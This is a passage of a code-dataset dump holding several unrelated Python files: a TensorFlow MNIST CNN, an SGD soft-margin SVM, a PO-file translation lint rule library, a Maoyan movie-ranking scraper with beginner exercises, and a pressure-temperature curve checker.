indent=2)\n","sub_path":"joulescope_ui/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":8075,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"123457311","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Jan 16 18:34:36 2017\n\n@author: LLL\n\"\"\"\nimport os\nimport numpy as np\nfrom scipy import special\nimport tensorflow as tf\n\nclass WaveIdentifyTrain():\n def __init__(self):\n self.sess=tf.Session()\n self.data_patch_len=784\n self.data_y_len=10\n self.data_chenel_n=1\n self.w1_shape=[784,784]\n self.w2_shape=[784,784]\n self.conv1_shape=[4,self.data_chenel_n,8]\n self.conv2_shape=[4,8,16]\n\n def init_var(self):\n self.x=tf.placeholder(tf.float32,shape=[None,self.data_patch_len,self.data_chenel_n])\n self.y=tf.placeholder(tf.float32,shape=[None,self.data_y_len])\n x_3d=tf.reshape(self.x,[-1,self.data_patch_len,self.data_chenel_n])\n \n x_w1=self.my_weigh(self.conv1_shape)\n x_b1=self.my_bias([self.conv1_shape[2]])\n x_wb1=self.my_conv_1d(x_3d,x_w1)+x_b1\n x_sigm1=tf.nn.relu(x_wb1)\n x_pool1=self.my_max_pool_1d(x_sigm1)\n \n x_w2=self.my_weigh(self.conv2_shape)\n x_b2=self.my_bias([self.conv2_shape[2]])\n x_wb2=self.my_conv_1d(x_pool1,x_w2)+x_b2\n x_sigm2=tf.nn.relu(x_wb2)\n x_pool2=self.my_max_pool_1d(x_sigm2)\n \n fc1_len=int(self.data_patch_len/1/1)\n x_fc1=self.my_weigh([fc1_len*self.conv2_shape[2],128])\n b_fc1=self.my_bias([128])\n xb_fc1=tf.matmul(tf.reshape(x_pool2,[-1,fc1_len*self.conv2_shape[2]]),x_fc1)+b_fc1\n x_fc_sigma1=tf.nn.relu(xb_fc1)\n \n self.kp_prb=tf.placeholder('float')\n x_drop=tf.nn.dropout(x_fc_sigma1,self.kp_prb)\n \n fc_w1=self.my_weigh([128,self.data_y_len])\n fc_b1=self.my_bias([self.data_y_len])\n fc_wb1=tf.matmul(x_drop,fc_w1)+fc_b1\n \n result=tf.nn.softmax(fc_wb1)\n \n cross_entropy=-tf.reduce_sum(self.y*tf.log(result))\n self.train_step = tf.train.AdamOptimizer(1e-4).minimize(cross_entropy)\n #self.train_step=tf.train.GradientDescentOptimizer()\n self.sess.run(tf.global_variables_initializer())\n \n validate=tf.equal(tf.argmax(result,1),tf.argmax(self.y,1))\n self.acc=tf.reduce_mean(tf.cast(validate,'float'))\n #print(fc1_len)\n #print(np.shape(self.sess.run(result,feed_dict={self.x: np.zeros([10,784]),self.y: np.zeros([10,10]), self.kp_prb: 0.5})))\n def my_conv_1d(self,data,flt):\n return tf.nn.conv1d(data,filters=flt,stride=1, padding='SAME')\n def my_bias(self,shape):\n init=tf.constant(0.1,shape=shape)\n return tf.Variable(init)\n def my_weigh(self,shape):\n init=tf.truncated_normal(shape,stddev=0.1)\n return tf.Variable(init)\n def my_max_pool_1d(self,data):\n return tf.nn.pool(data,window_shape=[1],pooling_type='MAX',strides=[1],padding='SAME')\n \n def train(self,data):\n return self.sess.run(self.train_step,feed_dict={self.x: data[0], self.y: data[1], self.kp_prb:0.5})\n def validate(self,data):\n return self.sess.run(self.acc,feed_dict={self.x: data[0], self.y: data[1], self.kp_prb:1})\n\n def saver(self,step):\n self.sv=tf.train.Saver()\n try:\n self.sv.save(self.sess,'var_back/model',global_step=step)\n except:\n os.mkdir('var_back')\n self.sv.save(self.sess,'var_back/model',global_step=step)\n def restore(self,step=-1):\n if(step>0):\n self.sv.restore(self.sess,'var_back/model-'+str(step))\n else:\n self.sv.recover_last_checkpoints('var_back/')\n \n \nif __name__ == '__main__':\n print(\"Do not run this file directily!\")\n print(\"Try to run simple file:\")\n from tensorflow.examples.tutorials.mnist import input_data\n mnist = input_data.read_data_sets('MNIST_data', one_hot=True)\n aa=WaveIdentifyTrain()\n aa.init_var()\n import matplotlib.pyplot as plt\n for i in range(5000):\n batch = mnist.train.next_batch(50)\n #plt.clf()\n #plt.imshow(np.reshape(batch[0][5],[28,28]),cmap=plt.get_cmap('Blues'))\n trans=np.reshape(batch[0],[-1,784,1])\n aa.train([trans,batch[1]])\n if(i%10==9):\n print(\"train step:%d accuracy:%f\"%(i,aa.validate([np.reshape(mnist.test.images,[-1,784,1]),mnist.test.labels])))\n #aa.saver(i)\n \n #aa.restore(109)\n #print(\"restore test\")\n #print(aa.validate([mnist.test.images,mnist.test.labels]))\n\n\n#con_x_1d=tf.nn.conv1d(x1d,filters=x1d_cov,stride=1, padding='SAME')","sub_path":"WaveIdentification/wave_rnn.py","file_name":"wave_rnn.py","file_ext":"py","file_size_in_byte":4470,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"260172401","text":"import numpy as np\n\n\nclass SoftSVM:\n \"\"\" 使用Hinge损失的软间隔支持向量机的随机梯度下降算法实现 \"\"\"\n def __init__(self, C=1000) -> None:\n self.C = C\n # end\n\n def fit(self, X, y, eta=0.01, N=5000):\n \"\"\" 训练函数 \"\"\"\n m, n = X.shape\n cw, cb = np.zeros((n, 1)), 0\n self.w, self.b = np.zeros((n, 1)), 0\n for r in range(N):\n ri = np.random.randint(m)\n rx = X[ri].reshape(-1, 1)\n ry = y[ri]\n s = (np.dot(cw.T, rx) + cb)* ry\n e = (s < 1).astype(np.int64)\n g_w = -e* ry* rx + (1.0 / self.C)* cw\n g_b = -e* ry\n cw -= eta* g_w\n cb -= eta* g_b\n self.w += cw\n self.b += cb\n self.w /= N\n self.b /= N\n # end\n\n def predict(self, X):\n \"\"\" 预测函数 \"\"\"\n return np.sign(X.dot(self.w) + self.b)\n # end\n# end\n","sub_path":"Modules/SVM_SOFT_SGD.py","file_name":"SVM_SOFT_SGD.py","file_ext":"py","file_size_in_byte":932,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"484595548","text":"#!/usr/bin/env python3\n# coding: utf-8\nimport re\nimport os\nimport sys\nimport fnmatch\nfrom collections import defaultdict\nfrom enum import IntEnum\nimport importlib\nfrom ansicolor import black, red\n\nclass Severity(IntEnum):\n # Notice should be used for rules where a significant number of unfixable false-positives are expected\n notice = 1\n # Info should be used for rules that have less impact and more false positives than standard rules.\n info = 2\n # Standard values should have impact on the readability that does not lead to misunderstandins.\n standard = 3\n # Warning values should have clearly visible impact on the readability.\n warning = 4\n # Dangerous values should harm the readability of the text significantly and have virtually no false-positives\n dangerous = 5\n\nif sys.version_info[0] < 3:\n print(\"This script requires Python version 3.x\")\n sys.exit(1)\n\n__cleanupRegex = re.compile(r'<(a|span|div|table)\\s*([a-z-]+=(\"[^\"]+\"|\\'[^\\']+\\')\\s*)*>(.+?)\\s*', re.MULTILINE)\n__cleanupDetectRegex = re.compile(r\"<(a|span|div|table)\")\n\ndef cleanupTranslatedString(s):\n \"\"\"\n Minor but fast cleanup of the msgstr in order to avoid hits in\n invisible parts like HTML.\n \"\"\"\n if not __cleanupDetectRegex.search(s):\n return s\n return __cleanupRegex.sub(r\"\\1\", s)\n\ndef importRulesForLanguage(lang, basedir=\".\"):\n \"\"\"Import ruleset from the language-specific python file\"\"\"\n moduleName = \"rules.{0}\".format(lang)\n print(black(\"Reading rules from {0}\".format(moduleName), bold=True))\n langModule = importlib.import_module(moduleName)\n print(black(\"Found {0} rules for language {1}\".format(len(langModule.rules), lang), bold=True))\n return langModule.rules\n\n_extractImgRegex = re.compile(r\"(https?://ka-perseus-graphie\\.s3\\.amazonaws\\.com/[0-9a-f]{40,40}\\.(png|svg))\")\n\nclass Rule(object):\n \"\"\"\n A baseclass for rules.\n Remember to implement __call__(self, msgstr, msgid),\n which must return the hit or None if no hit is found.\n \"\"\"\n def __init__(self, name, severity=Severity.standard):\n self.name = name\n # If you need to save some state, you can do it here.\n # This MUST NOT be filled by subclasses.\n self.custom_info = {}\n self.severity = severity\n def get_machine_name(self):\n \"\"\"Get a machine-readable name from a rule name\"\"\"\n name = self.name.lower().replace(\"'\", \"\").replace(\"\\\"\", \"\")\n name = name.replace(\"(\", \"\").replace(\")\", \"\").replace(\"{\", \"\")\n name = name.replace(\"}\", \"\").replace(\"\\\\\", \"\").replace(\",\", \"\")\n name = name.replace(\"*\", \"\").replace(\"/\", \"-\").replace(\"%\", \"\")\n name = name.replace(\"<\", \"\").replace(\">\", \"\").replace(\"/\", \"\")\n name = name.replace(\">\", \"\").replace(\"<\", \"\").replace(\":\",\"\")\n name = re.sub(r\"\\s+\", \"-\", name)\n name = re.sub(r\"-+\", \"-\", name)\n name = re.sub(r\"^-\", \"\", name)\n return name\n def getBootstrapColor(self):\n \"\"\"Get a bootstrap color class (text-...) depending on the severity\"\"\"\n if self.severity == Severity.notice: return \"text-muted\"\n elif self.severity == Severity.info: return \"text-success\"\n elif self.severity == Severity.standard: return \"text-primary\"\n elif self.severity == Severity.warning: return \"text-warning\"\n elif self.severity == Severity.dangerous: return \"text-danger\"\n else: return \"text-info\"\n def __lt__(self, other):\n if self.severity != other.severity:\n return self.severity < other.severity\n return self.name < other.name\n def apply_to_po(self, po, filename=\"[unknown file]\", ignore_untranslated=True):\n \"\"\"\n Apply to a dictionary of parsed PO files.\n Yields tuples entry, hit, filename\n \"\"\"\n for entry in po:\n # Ignore empty translations (-> untranslated)\n if not entry.msgstr:\n continue\n # Ignore strings which are the same orig/msgid\n # This accounts for the fact that we don't know how\n if ignore_untranslated and entry.msgstr == entry.msgid:\n continue\n # Translated string cleanup\n msgstr = cleanupTranslatedString(entry.msgstr)\n # Apply the rule\n for hit in self(msgstr, entry.msgid, entry.tcomment, filename=filename):\n #Find images in both original and new string\n origImages = [h[0] for h in _extractImgRegex.findall(entry.msgid)]\n translatedImages = [h[0] for h in _extractImgRegex.findall(entry.msgstr)]\n yield (entry, hit, filename, origImages, translatedImages)\n\nclass SimpleRegexRule(Rule):\n \"\"\"\n A simple rule type that matches a regex to the translated string.\n Partial matches (via re.search) are considered hits.\n \"\"\"\n def __init__(self, name, regex, severity=Severity.standard, flags=re.UNICODE):\n super().__init__(name, severity)\n self.re = re.compile(regex, flags)\n self.regex_str = regex\n def description(self):\n return \"Matches regular expression '%s'\" % self.regex_str\n def __call__(self, msgstr, msgid, tcomment=\"\", filename=None):\n hit = self.re.search(msgstr)\n if hit:\n yield hit.group(0)\n\nclass SimpleSubstringRule(Rule):\n \"\"\"\n A simple rule type that hits when a given substring is found in the msgstr.\n \"\"\"\n def __init__(self, name, substr, severity=Severity.standard, case_insensitive=False):\n super().__init__(name, severity)\n self.substr = substr\n self.ci = case_insensitive\n if self.ci:\n self.substr = self.substr.lower()\n def description(self):\n return \"Matches substring '%s'\" % self.substr\n def __call__(self, msgstr, msgid, tcomment=\"\", filename=None):\n # Case-insensitive preprocessing\n if self.ci:\n msgstr = msgstr.lower()\n if msgstr.find(self.substr) != -1:\n yield self.substr\n\nclass TranslationConstraintRule(Rule):\n \"\"\"\n Enforces that a certain regex in the original string will\n be translated a certain way\n\n i.e. the rule hits when regexOrig has >= 1 match in the msgid\n while regexTranslated has 0 machte\n \"\"\"\n def __init__(self, name, regexOrig, regexTranslated, severity=Severity.standard, flags=re.UNICODE):\n super().__init__(name, severity)\n self.reOrig = re.compile(regexOrig, flags)\n self.reTranslated = re.compile(regexTranslated, flags)\n self.regex_orig_str = regexOrig\n self.regex_translated_str = regexTranslated\n def description(self):\n return \"Matches '%s' if translated as '%s'\" % (self.regex_orig_str, self.regex_translated_str)\n def __call__(self, msgstr, msgid, tcomment=\"\", filename=None):\n if self.reOrig.search(msgid) and not self.reTranslated.search(msgstr):\n yield \"[failed constraint]\"\n\nclass NegativeTranslationConstraintRule(Rule):\n \"\"\"\n Enforces that a certain regex in the original string will\n NOT be translated a certain way,\n\n i.e. the rule hits when regexOrig has >= 1 match in the msgid\n while regexTranslated has a match.\n \"\"\"\n def __init__(self, name, regexOrig, regexTranslated, severity=Severity.standard, flags=re.UNICODE):\n super().__init__(name, severity)\n self.reOrig = re.compile(regexOrig, flags)\n self.reTranslated = re.compile(regexTranslated, flags)\n self.regex_orig_str = regexOrig\n self.regex_translated_str = regexTranslated\n def description(self):\n return \"Matches '%s' if NOT translated as '%s'\" % (self.regex_orig_str, self.regex_translated_str)\n def __call__(self, msgstr, msgid, tcomment=\"\", filename=None):\n if self.reOrig.search(msgid) and self.reTranslated.search(msgstr):\n yield \"[failed constraint]\"\n\nclass DynamicTranslationIdentityRule(Rule):\n \"\"\"\n Enforces that a match to the given regex does is contained in the translated string as-is.\n This rule can also be used as a negative rule to enforce the match is not present\n in the translated string.\n \"\"\"\n def __init__(self, name, regex, negative=False, group=None, severity=Severity.standard, flags=re.UNICODE):\n super().__init__(name, severity)\n self.regex_str = regex\n self.regex = re.compile(regex, flags)\n self.negative = negative\n self.group = group\n def description(self):\n return \"Matches a match for '%s' if %spresent in the translated string\" % (self.regex_str, \"NOT \" if self.negative else \"\")\n def __call__(self, msgstr, msgid, tcomment=\"\", filename=None):\n matches = self.regex.findall(msgid)\n if not matches: return\n # Apply group filter if enabled\n if self.group is not None:\n matches = [m[self.group] for m in matches]\n # Check individual matches\n if self.negative:\n for match in matches:\n if match in msgstr:\n yield match\n else: # Positive rule\n for match in matches:\n if match not in msgstr:\n yield match\n\ndef SimpleGlobRule(name, glob):\n \"\"\"Rule wrapper that translates a glob-ish rule to a regex rule\"\"\"\n return SimpleRegexRule(name, fnmatch.translate(glob))\n\n_whitespaceRegex = re.compile(r\"\\s+\")\n\nclass ExactCopyRule(Rule):\n \"\"\"\n Requires that when a list of regex matches is present in the orignal text,\n the exact same list of matches is also present in the same order.\n\n This can be used, for example, to ensure GUI elements, numbers or URLs are the same in\n both the translated text and the original.\n \"\"\"\n def __init__(self, name, regex, severity=Severity.standard, aliases=defaultdict(str), ignore_whitespace=True, group=None):\n super().__init__(name, severity)\n self.regex = re.compile(regex)\n self.regex_str = regex\n self.aliases = aliases\n self.group = group\n self.ignore_whitespace = ignore_whitespace\n def description(self):\n return \"Matches if all instances of '%s' are the same (with %d aliases)\" % (self.regex_str, len(self.aliases))\n def __call__(self, msgstr, msgid, tcomment=\"\", filename=None):\n origMatches = self.regex.findall(msgid)\n translatedMatches = self.regex.findall(msgstr)\n # Apply aliases\n origMatches = [self.aliases[x] or x for x in origMatches]\n translatedMatches = [self.aliases[x] or x for x in translatedMatches]\n # Apply group if\n if self.group is not None: # None - Use entire string. No groups must be present in regex\n origMatches = [m[self.group] for m in origMatches]\n translatedMatches = [m[self.group] for m in translatedMatches]\n # Apply whitespace filtering\n if self.ignore_whitespace:\n origMatches = [_whitespaceRegex.sub(\"\", x) or x for x in origMatches]\n translatedMatches = [_whitespaceRegex.sub(\"\", x) or x for x in translatedMatches]\n # Find index of first mismatch\n try:\n idx = next(idx for idx, (x, y) in\n enumerate(zip(origMatches, translatedMatches)) if x != y)\n yield \"[First expression mismatch at occurrence %d]\" % (idx + 1)\n except StopIteration: # No mismatch\n pass\n\nclass IgnoreByFilenameRegexWrapper(Rule):\n \"\"\"\n Ignore a rule (i.e. force zero hits) for a set of filenames defined by a regex.\n\n If you want to ignore a rule for all filenames starting with \"learn.\", you'd use:\n\n \"\"\"\n def __init__(self, filename_regex, child, invert=False):\n \"\"\"\n Keyword arguments:\n invert: Set this to true to invert this regex, i.e. mismatches of the regex lead to a ignored entry\n \"\"\"\n super().__init__(child.name)\n self.child = child\n self.invert = invert\n self.filename_regex = re.compile(filename_regex)\n self.filename_regex_str = filename_regex\n self.severity = child.severity\n def description(self):\n if self.invert:\n return \"%s (only applied to filenames matching '%s')\" % (self.child.description(), self.filename_regex_str)\n else:\n return \"%s (ignored for filenames matching '%s')\" % (self.child.description(), self.filename_regex_str)\n def __call__(self, msgstr, msgid, tcomment=\"\", filename=None):\n if bool(self.filename_regex.match(filename)) != self.invert:\n return None\n yield from self.child(msgstr, msgid, tcomment, filename)\n\nclass IgnoreByFilenameListWrapper(Rule):\n \"\"\"\n Ignore a rule (i.e. force zero hits) for a set of filenames defined by a list of exact hits.\n \"\"\"\n def __init__(self, filenames, child):\n super().__init__(child.name)\n self.child = child\n self.filenames = frozenset(filenames)\n self.severity = child.severity\n def description(self):\n return \"%s (ignored for files %s)\" % (self.child.description(), str(list(self.filenames)))\n def __call__(self, msgstr, msgid, tcomment=\"\", filename=None):\n if filename in self.filenames:\n return None\n yield from self.child(msgstr, msgid, tcomment, filename)\n\nclass IgnoreByMsgidRegexWrapper(Rule):\n \"\"\"\n Ignore a rule if a regex search in the msgid returns a certain value.\n\n This can be useful to ignore special cases of translation which\n are distinguishable by the untranslated (english) text, e.g.\n \"Green's theorem\" as a special case of untranslated \"green\".\n\n Note that if a single regex hit is found, the entire string is ignore\n \"\"\"\n def __init__(self, msgid_regex, child):\n super().__init__(child.name)\n self.child = child\n self.msgid_regex = re.compile(msgid_regex)\n self.msgid_regex_str = msgid_regex\n self.severity = child.severity\n def description(self):\n return \"%s (ignored for msgids matching '%s')\" % (self.child.description(), self.msgid_regex_str)\n def __call__(self, msgstr, msgid, tcomment=\"\", filename=None):\n if self.msgid_regex.search(msgid):\n return None\n yield from self.child(msgstr, msgid, tcomment, filename)\n\n\nclass IgnoreByMsgstrRegexWrapper(Rule):\n \"\"\"\n Ignore a rule if a regex search in the msgstr returns a certain value.\n\n This can be useful to ignore special cases of translation which\n are distinguishable by the untranslated (english) text, e.g.\n \"Green's theorem\" as a special case of untranslated \"green\".\n\n Note that if a single regex hit is found, the entire string is ignore\n \"\"\"\n def __init__(self, msgstr_regex, child):\n super().__init__(child.name)\n self.child = child\n self.msgstr_regex = re.compile(msgstr_regex)\n self.msgid_regex_str = msgstr_regex\n self.severity = child.severity\n def description(self):\n return \"%s (ignored for msgids matching '%s')\" % (self.child.description(), self.msgid_regex_str)\n def __call__(self, msgstr, msgid, tcomment=\"\", filename=None):\n if self.msgstr_regex.search(msgstr):\n return None\n yield from self.child(msgstr, msgid, tcomment, filename)\n\nclass IgnoreByTcommentRegexWrapper(Rule):\n \"\"\"\n Ignore a rule if a regex search in the tcomment returns a certain value.\n\n This can be useful to ignore special cases of translation which\n are distinguishable by the untranslated (english) text, e.g.\n \"Green's theorem\" as a special case of untranslated \"green\".\n\n Note that if a single regex hit is found, the entire string is ignore\n \"\"\"\n def __init__(self, tcommentRegex, child):\n super().__init__(child.name)\n self.child = child\n self.tcommentRegex = re.compile(tcommentRegex)\n self.tcomment_regex_str = tcommentRegex\n self.severity = child.severity\n def description(self):\n return \"%s (ignored for tcomments matching '%s')\" % (self.child.description(), self.tcomment_regex_str)\n def __call__(self, msgstr, msgid, tcomment=\"\", filename=None):\n if self.tcommentRegex.search(tcomment):\n return None\n yield from self.child(msgstr, msgid, tcomment, filename)\n\nclass TextListRule(Rule):\n \"\"\"\n A rule that excepts a text list of words (e.g. typos), each of which will generate a\n rule hit. The file is expected to contain one string per line.\n\n If the file does not exist, this method prints a red bold error message and does not\n generate any rule hits\n \"\"\"\n def __init__(self, name, filename, severity=Severity.standard, flags=re.UNICODE):\n super().__init__(name, severity)\n self.filename = filename\n self.regexes = []\n # Check if file exists\n if os.path.isfile(filename):\n with open(filename) as infile:\n for line in infile:\n rgx = line.strip().replace(\" \", r\"\\s+\")\n #Don't match in the middle of a word\n rgx = \"\\\\b{0}\\\\b\".format(rgx)\n self.regexes.append(re.compile(rgx, flags=flags))\n else: # File does not exist\n print(red(\"Unable to find text list file %s\" % filename, bold=True))\n def description(self):\n return \"Matches one of the strings in file %s\" % self.filename\n def __call__(self, msgstr, msgid, tcomment=\"\", filename=None):\n for regex in self.regexes:\n hit = regex.search(msgstr)\n if hit:\n yield hit.group(0)\n\ndef findRule(rules, name):\n \"Find a rule by name\"\n try:\n next(rule for rule in rules if rule.name == name)\n except StopIteration:\n return None\n","sub_path":"Rules.py","file_name":"Rules.py","file_ext":"py","file_size_in_byte":17673,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"268163545","text":"\"\"\"通过oop处理学生信息\"\"\"\r\n# class Student(object):\r\n# def __init__(self,name,age):\r\n# self.name=name\r\n# self.age=age\r\n\r\n# def show(self):\r\n# print('%s:%s'%(self.name,self.age))\r\n\r\n\r\n# stu1=Student('Morty',22)\r\n# stu2=Student('daisy',22)\r\n# stu2.show()\r\n# stu1.show()\r\n\r\n\"\"\"继承\"\"\"\r\n# 父类\r\n# class Animal(object):\r\n# def __init__(self,name):\r\n# self.name=name\r\n\r\n# def run(self):\r\n# print('{} run...'.format(self.name))\r\n\r\n# 子类\r\n# class Cat(Animal):\r\n# 重写父类方法\r\n# def __init__(self,name,color):\r\n# 调用父类的方法\r\n# super().__init__(name)\r\n# self.color=color\r\n# def show(self):\r\n# print('name={},color={}'.format(self.name,self.color))\r\n\r\n# 子类\r\n# class Dog(Animal):\r\n# def run(self):\r\n# print('{}run fast11...'.format(self.name))\r\n\r\n# 创建对象\r\n# cat=Cat('泡芙','白')\r\n# 调用方法\r\n# cat.run()\r\n# cat.show()\r\n\r\n# dog=Dog('汪汪')\r\n# dog.run()\r\n\r\n\"\"\"实现文件复制功能\"\"\"\r\n# with open('D:\\代码学习“十四五”,有“数”.txt','r',encoding='utf-8') as file:\r\n# print(file.read())\r\n# new_file=open('D:\\练习.txt','w',encoding='utf-8')\r\n# for i in file.readline():\r\n# new_file.write(file.read())\r\n# print('结束')\r\n\r\n# file.close()\r\n# new_file.close()\r\n\r\n# 爬取猫眼电影前100\r\nimport requests\r\nimport re\r\nimport json\r\nimport time\r\nimport random\r\nfrom requests.exceptions import RequestException\r\n\r\n\r\n#获取单一页面\r\ndef get_one_page(url):\r\n try:\r\n headers={\r\n 'User-Agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36'\r\n }\r\n response=requests.get(url=url,headers=headers)\r\n if response.status_code==200:\r\n return response.text\r\n return None\r\n except RequestException:\r\n return None\r\n\r\n#解析页面\r\ndef parse_one_page(html):\r\n pattern=re.compile(\r\n #获取排名\r\n r'
    .*?board-index.*?>(\\d+?)'\r\n #获取电影图片\r\n r'.*?data-src=\"(.*?)\".*?'\r\n #获取电影名称\r\n r'.*?class=\"name\".*?title=\"(.*?)\".*?'\r\n #电影主演\r\n r'.*?class=\"star\".+?(.*?)

    '\r\n #发布时间\r\n r'.*?class=\"releasetime\".+?(.*?)

    '\r\n #评分\r\n r'.*?class=\"integer\".+?(.*?)'\r\n #评分\r\n r'.*?\"fraction\".+?(.*?).*?
    ',re.S\r\n )\r\n re_lists=re.findall(pattern,html)\r\n for re_list in re_lists:\r\n yield{\r\n 'index':re_list[0],\r\n 'image':re_list[1],\r\n 'title':re_list[2],\r\n 'actor':re_list[3].strip()[3:],\r\n 'time':re_list[4].strip()[5:],\r\n 'score':re_list[5]+re_list[6]\r\n }\r\n\r\n#获取所有的url\r\ndef url_list(offset):\r\n if offset==0:\r\n page_url='http://maoyan.com/board/4'\r\n return page_url\r\n else:\r\n page_url='http://maoyan.com/board/4'+'?offset='+str(offset)\r\n return page_url\r\n\r\n#保存数据\r\ndef write(final_result):\r\n with open('爬取猫眼电影.txt','a',encoding='utf-8') as file:\r\n file.write(json.dumps(final_result,ensure_ascii=False)+'\\n')\r\n\r\n#主函数\r\ndef main():\r\n offset_list=[0,10,20,30,40,50,60,70,80,90]\r\n for offset in offset_list:\r\n url=url_list(offset)\r\n html=get_one_page(url)\r\n result=parse_one_page(html)\r\n for i in range(15):\r\n final_result=next(result)\r\n print(final_result)\r\n write(final_result)\r\n\r\nif __name__=='__main__':\r\n main()\r\n time.sleep(1)","sub_path":"3.15学习.py","file_name":"3.15学习.py","file_ext":"py","file_size_in_byte":3531,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"563526367","text":"# Найти сумму и произведение цифр трехзначного числа, которое вводит пользователь.\nfrom functools import reduce\n\nqwe = 742\n\n\ndef sum_mult(q):\n list_int = [int(p) for p in str(q)]\n res_sum = sum(list_int)\n res_mult = reduce(lambda w, e: w * e, list_int)\n return res_sum, res_mult\n\n\nres_sum_mult = sum_mult(qwe)\nprint(res_sum_mult)\n\n# По введенным пользователем координатам двух точек вывести уравнение прямой,\n# проходящей через эти точки. ///////Общее уравнение прямой имеет вид y = kx + b.\n# Для какой-то конкретной прямой в уравнении коэффициенты k и b заменяются на числа,\n# например, y = 4x - 2. Задача сводится именно к нахождению этих коэффициентов.\n# //////////////////////////////////////////////////////////////////////////////\n# Алгоритм решения данной задаче на языке программирования будет таков:\n# Получить значения координат первой точки и присвоить их переменным, например x1 и y1.\n# Получить значения координат (x2, y2) второй точки.\n# Вычислить значение k по формуле k = (y1 - y2) / (x1 - x2).\n# Вычислить значение b по формуле b = y2 - k * x2.\n# Вывести на экран полученное уравнение.\n# А(3;2), а координаты B(-1;-1)\nx = ''\nx1 = 3\ny1 = 2\nx2 = -1\ny2 = -1\nk = (y1 - y2) / (x1 - x2)\nprint(k)\nb = y2 - k * x2\nprint(b)\n# y = 0.75 * x + 0.25\nimport math\n\n# Найти длину гипотенузы\n# По двум введенным пользователем катетам вычислить длину гипотенузы.\n# c = sqrt(a2 + b2),\n# c2 = a2 + b2\nq = int(input('=======>> a'))\nw = int(input('=======> b'))\n\n\ndef length_gipp(a, b):\n leng = round(math.sqrt(a ** 2 + b ** 2))\n\n return leng\n\n\nres_length_gipp = length_gipp(q, w)\nprint(res_length_gipp)\n\n","sub_path":"test01/sum_mult.py","file_name":"sum_mult.py","file_ext":"py","file_size_in_byte":2267,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"242484346","text":"import math\n\n\nclass PTCureve:\n \"\"\"\n 0 : 만족, 1: 불만족\n PTCureve().Check(Temp=110, Pres=0)\n \"\"\"\n def __init__(self):\n self.UpTemp = [0, 37.000000, 65.500000, 93.000000, 104.400000, 110.000000,\n 115.500000, 121.000000, 148.800000, 176.500000, 186.500000, 350.0]\n self.UpPres = [29.5, 29.500000, 30.500000, 36.500000, 42.000000, 45.600000,\n 49.000000, 54.200000, 105.000000, 176.000000, 200.000000, 592]\n self.BotTemp = [0, 37.000000, 149.000000, 159.000000, 169.000000, 179.000000,\n 204.000000, 232.000000, 260.000000, 287.700000, 350.000000]\n self.BotPres = [17.0, 17.000000, 17.000000, 17.300000, 17.600000, 20.000000,\n 31.600000, 44.300000, 58.000000, 71.000000, 100.000000]\n self.UpLineFunc = []\n self.BotLineFunc = []\n # 직교 함수를 그려 현재 포인트에서 PT 커브까지 거리를 계산하기 위해서 사용\n self.UpLineOrtFunc = []\n self.BotLineOrtFunc = []\n\n self._make_bound_UpLine()\n self._make_bound_BotLine()\n\n def _make_bound_func(self, Temp, Pres):\n \"\"\"\n 2점에 대한 1차원 함수 반환\n :param Temp: [a1, a2] == x\n :param Pres: [b1, b2] == y\n :return: func\n \"\"\"\n # y1 = ax1 + b\n # y2 = ax2 + b\n # a = (y1-y2)/(x1-x2)\n # b = y1 - {(y1-y2)/(x1-x2) * x1}\n get_a = (Pres[0] - Pres[1]) / (Temp[0] - Temp[1])\n get_b = Pres[0] - get_a * Temp[0]\n return lambda temp: get_a * temp + get_b\n\n def _make_bound_orthogonal_func(self, Temp, Pres):\n \"\"\"\n 2점에 대한 ax+by+c = 0\n :param Temp: [a1, a2] == x\n :param Pres: [b1, b2] == y\n :return: [a, b, c] List\n \"\"\"\n # y1 = ax1 + b\n # y2 = ax2 + b\n # a = (y1-y2)/(x1-x2)\n # b = y1 - {(y1-y2)/(x1-x2) * x1}\n get_a = (Pres[0] - Pres[1]) / (Temp[0] - Temp[1]) # slop\n get_b = Pres[0] - get_a * Temp[0]\n # y = get_a * x + get_b ==> ax + by + c = 0\n a = - get_a\n b = 1\n c = - get_b\n return [a, b, c]\n\n def _make_bound_UpLine(self):\n for i in range(len(self.UpTemp) - 1):\n self.UpLineFunc.append(self._make_bound_func(Temp=self.UpTemp[i:i+2], Pres=self.UpPres[i:i+2]))\n self.UpLineOrtFunc.append(self._make_bound_orthogonal_func(Temp=self.UpTemp[i:i+2], Pres=self.UpPres[i:i+2]))\n\n def _make_bound_BotLine(self):\n for i in range(len(self.BotTemp) - 1):\n self.BotLineFunc.append(self._make_bound_func(Temp=self.BotTemp[i:i+2], Pres=self.BotPres[i:i+2]))\n self.BotLineOrtFunc.append(self._make_bound_orthogonal_func(Temp=self.BotTemp[i:i+2], Pres=self.BotPres[i:i+2]))\n\n def _call_fun(self, Temp):\n UpF, BotF = 0, 0\n for i in range(len(self.UpTemp) - 1):\n if self.UpTemp[i] <= Temp < self.UpTemp[i + 1]:\n UpF = self.UpLineFunc[i]\n for i in range(len(self.BotTemp) - 1):\n if self.BotTemp[i] <= Temp < self.BotTemp[i + 1]:\n BotF = self.BotLineFunc[i]\n return UpF, BotF\n\n def _call_ort_fun(self, Temp):\n UpOrtF, BotOrtF = 0, 0\n for i in range(len(self.UpTemp) - 1):\n if self.UpTemp[i] <= Temp < self.UpTemp[i + 1]:\n UpOrtF = self.UpLineOrtFunc[i]\n for i in range(len(self.BotTemp) - 1):\n if self.BotTemp[i] <= Temp < self.BotTemp[i + 1]:\n BotOrtF = self.BotLineOrtFunc[i]\n return UpOrtF, BotOrtF\n\n def _get_pres(self, Temp):\n \"\"\"\n 온도 받아서 위아래 Pres 조건 반환\n :param Temp: [0~..]\n :return: [Up_pres, Bot_pres]\n \"\"\"\n UpF, BotF = self._call_fun(Temp=Temp)\n Up_pres, Bot_pres = UpF(Temp), BotF(Temp)\n return Up_pres, 